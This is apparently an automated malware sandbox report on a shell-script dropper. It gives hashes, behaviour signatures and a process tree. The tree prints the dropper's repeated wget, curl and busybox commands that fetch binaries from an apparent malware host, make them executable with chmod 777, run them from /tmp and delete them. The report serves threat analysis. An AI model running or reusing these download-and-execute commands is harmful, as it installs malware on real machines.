Analysis
-
max time kernel
111s -
max time network
85s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:44
Static task
static1
Behavioral task
behavioral1
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
-
Size
10KB
-
MD5
38c016b5fafe4cb231ee103b3d469c38
-
SHA1
11bf75788a74d2c7bf1a077fb4baedebb0fbf051
-
SHA256
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244
-
SHA512
bb6b857e72ce4063f5fb64cfe1b4950071040ba0b7ae6c3bbab6db49173f1bf43357fefdcd09c87d5c69920a5366e780036c41f4d1bf597042bb693386d5e86a
-
SSDEEP
192:C2i/8cZEED6O20nMNso9OuNSWso9Ou32i/8cLEED6Ol:C2i/8cZEED6O20nMNso9OuNSWso9Ou3Z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 899 chmod 906 chmod 927 chmod 941 chmod 955 chmod 920 chmod 990 chmod 738 chmod 948 chmod 756 chmod 962 chmod 892 chmod 783 chmod 878 chmod 976 chmod 885 chmod 913 chmod 934 chmod 813 chmod 857 chmod 969 chmod 983 chmod 864 chmod 871 chmod 997 chmod 1004 chmod 747 chmod 820 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 739 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 748 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 757 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 784 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 814 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c 821 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk 858 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 865 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 872 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 879 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 886 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 893 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 900 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 907 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 914 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN 921 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v 928 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb 935 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I 942 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc 949 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa 956 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj 963 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 970 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 977 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 984 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS 991 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c 998 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk 1005 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 867 wget 870 busybox 884 busybox 895 wget 931 curl 980 curl 1000 wget 863 busybox 874 wget 905 busybox 810 busybox 824 curl 834 busybox 972 wget 986 wget 819 busybox 924 curl 952 curl 982 busybox 751 curl 868 curl 889 curl 959 curl 965 wget 742 wget 753 busybox 776 busybox 909 wget 919 busybox 923 wget 968 busybox 750 wget 763 wget 940 busybox 975 busybox 987 curl 788 wget 944 wget 951 wget 817 curl 860 wget 888 wget 912 busybox 966 curl 973 curl 979 wget 989 busybox 994 curl 711 wget 736 busybox 816 wget 823 wget 875 curl 916 wget 930 wget 947 busybox 1001 curl 746 busybox 926 busybox 1003 busybox 881 wget 882 curl 902 wget 933 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl File opened for modification /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c curl File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk curl File opened for modification /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN curl File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl File opened for modification /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk curl File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl File opened for modification /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb curl File opened for modification /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c curl File opened for modification /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I curl File opened for modification /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 curl File opened for modification /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v curl File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS curl
Processes
-
/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:711
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:749
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
PID:753
-
-
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:760
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:763
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
PID:776
-
-
/bin/chmodchmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵PID:787
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- System Network Configuration Discovery
PID:788
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- System Network Configuration Discovery
PID:810
-
-
/bin/chmodchmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj2⤵PID:815
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- System Network Configuration Discovery
PID:816
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c2⤵PID:822
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- System Network Configuration Discovery
PID:823
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk2⤵PID:859
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- System Network Configuration Discovery
PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:877
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:891
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:898
-
-
/bin/chmodchmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s282⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I2⤵PID:937
-
-
